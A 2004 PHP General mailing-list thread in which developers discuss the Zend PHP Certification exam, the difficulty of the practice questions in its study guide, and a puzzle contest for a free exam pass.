Re: [PHP] Zend PHP Certification test
--- Rory Browne [EMAIL PROTECTED] wrote: I haven't done the exam, yet, but based on some of the practice questions, I'm getting worried. I'm finding sample questions whose answers are not covered in the book. If you're talking about the questions in the back of the Zend Certification Guide, don't worry - those questions are much more difficult and obscure than what you'll find on the actual exam. If it makes you feel better, several of us from the advisory board looked through those at OSCON, and we all missed most of the first few questions. :-) One such question was a list(, $var) = whatever, and nowhere in the book could I find an explanation for same. Yeah, I got that one, but the other guys thought it would be a parse error or something. Having the comma first just skips the first argument - it's like you don't want to assign the first value to a variable. Not knowing this is fine. I've also used count, and strlen many times, but I've never used count on a non-array, which is what strlen returns. I think this is something you should be able to answer, but that's just me. It's true that most people who use count() use it on an array, but it's not really an array function. It just happens to not make much practical sense to count something that's only going to have one value (or null, which will return 0). However, while practicality is great, I think some theoretical foundation is also important. I didn't write this question, so that's not why I'm defending it. :-) Some of the questions in the guide require you to deduce the correct answer from what you've learned. This can rarely be achieved if the guide is your only exposure to a topic, and this is somewhat intentional. We tried to target developers who have at least 6 months of professional PHP experience (e.g., you've been writing non-trivial PHP applications every day for at least 6 months). The guide was written to help people expose themselves to a broader range of topics than their practical experience might have exposed them to, because the exam is pretty thorough. I think a very experienced developer can pass the exam without using the guide with little trouble, but I don't think an inexperienced developer can read the guide and hope to pass. You need more than that. Hope that helps. Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming December 2004http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
--- Matt M. [EMAIL PROTECTED] wrote: I am looking into taking the test, just hoping Zend runs the $100 deal again. You can win a free pass to take the exam by being the first to solve this puzzle: http://shiflett.org/archive/55 Enjoy. :-) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming December 2004http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Zend PHP Certification test
snip I passed. snip Greg Donald Zend Certified Engineer http://gdconsultants.com/ http://destiney.com/ Congratulations Greg. Like the new sig ! ;) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Zend PHP Certification test
Hi, I'd be interested in hearing your honest feedback after you take it, whether privately or on this list. Hopefully ZCE becomes a respected acronym, unlike MCSE. :-) I passed. I thought the test was very challenging. The areas I found most Congrats! -Dan Joseph -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
On Thu, 30 Sep 2004 10:17:53 -0700 (PDT), Chris Shiflett [EMAIL PROTECTED] wrote: I think a very experienced developer can pass the exam without using the guide with little trouble, but I don't think an inexperienced developer can read the guide and hope to pass. You need more than that. I agree. At the same time, I actually learned a few things from the guide. Like how useful preg_match_all() is for example. I never used it before, but I definitely will in the future. Everyone has their weak points, and the guide will point those out to you. -- Greg Donald Zend Certified Engineer http://gdconsultants.com/ http://destiney.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Zend PHP Certification test
This is very interesting reading. I've been using PHP (almost) daily for the past 7 months so Chris' comments do encourage me to consider the possibility of going for the certification in time. I do think I would need the study guide though as there are many topics being discussed on this list that are new to me and my experience has been with only one application at present. My problem (as I'm sure is true with many others) is that I need to get the job done ASAP and rarely have time to research the 'best' way of doing things. This list is very good at getting me to see alternatives to how I am doing things. Thanks Graham -Original Message- From: Chris Shiflett [mailto:[EMAIL PROTECTED] Sent: 30 September 2004 18:18 To: Rory Browne; PHP General Subject: Re: [PHP] Zend PHP Certification test --- Rory Browne [EMAIL PROTECTED] wrote: I haven't done the exam, yet, but based on some of the practice questions, I'm getting worried. I'm finding sample questions whose answers are not covered in the book. If you're talking about the questions in the back of the Zend Certification Guide, don't worry - those questions are much more difficult and obscure than what you'll find on the actual exam. If it makes you feel better, several of us from the advisory board looked through those at OSCON, and we all missed most of the first few questions. :-) One such question was a list(, $var) = whatever, and nowhere in the book could I find an explanation for same. Yeah, I got that one, but the other guys thought it would be a parse error or something. Having the comma first just skips the first argument - it's like you don't want to assign the first value to a variable. Not knowing this is fine. I've also used count, and strlen many times, but I've never used count on a non-array, which is what strlen returns. I think this is something you should be able to answer, but that's just me. It's true that most people who use count() use it on an array, but it's not really an array function. It just happens to not make much practical sense to count something that's only going to have one value (or null, which will return 0). However, while practicality is great, I think some theoretical foundation is also important. I didn't write this question, so that's not why I'm defending it. :-) Some of the questions in the guide require you to deduce the correct answer from what you've learned. This can rarely be achieved if the guide is your only exposure to a topic, and this is somewhat intentional. We tried to target developers who have at least 6 months of professional PHP experience (e.g., you've been writing non-trivial PHP applications every day for at least 6 months). The guide was written to help people expose themselves to a broader range of topics than their practical experience might have exposed them to, because the exam is pretty thorough. I think a very experienced developer can pass the exam without using the guide with little trouble, but I don't think an inexperienced developer can read the guide and hope to pass. You need more than that. Hope that helps. Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming December 2004http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Zend PHP Certification test
Hi, You can win a free pass to take the exam by being the first to solve this puzzle: http://shiflett.org/archive/55 Which part on this page is the puzzle? -Dan Joseph -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Zend PHP Certification test
[snip] You can win a free pass to take the exam by being the first to solve this puzzle: http://shiflett.org/archive/55 Which part on this page is the puzzle? [/snip] The clock. BEWARE - real time eater-upper! -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Zend PHP Certification test
--- Dan Joseph [EMAIL PROTECTED] wrote: Hi, You can win a free pass to take the exam by being the first to solve this puzzle: http://shiflett.org/archive/55 Which part on this page is the puzzle? Maybe that's the puzzle... :^) -Dan Joseph -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php = Mark Weinstock [EMAIL PROTECTED] *** You can't demand something as a right unless you are willing to fight to death to defend everyone else's right to the same thing. *** __ Do you Yahoo!? Yahoo! Mail - You care about security. So do we. http://promotions.yahoo.com/new_mail -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Zend PHP Certification test
--- Jay Blanchard [EMAIL PROTECTED] wrote: [snip] You can win a free pass to take the exam by being the first to solve this puzzle: http://shiflett.org/archive/55 Which part on this page is the puzzle? [/snip] The clock. BEWARE - real time eater-upper! Yeah, it's just the clock, as Jay points out. No one has won yet, so there's still a free pass available. (Thanks to Zend for sponsoring this fun little game.) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming December 2004http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
You can win a free pass to take the exam by being the first to solve this puzzle: http://shiflett.org/archive/55 Enjoy. :-) I think I have it, why dont you email me the answer and I will double check that against what I got. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
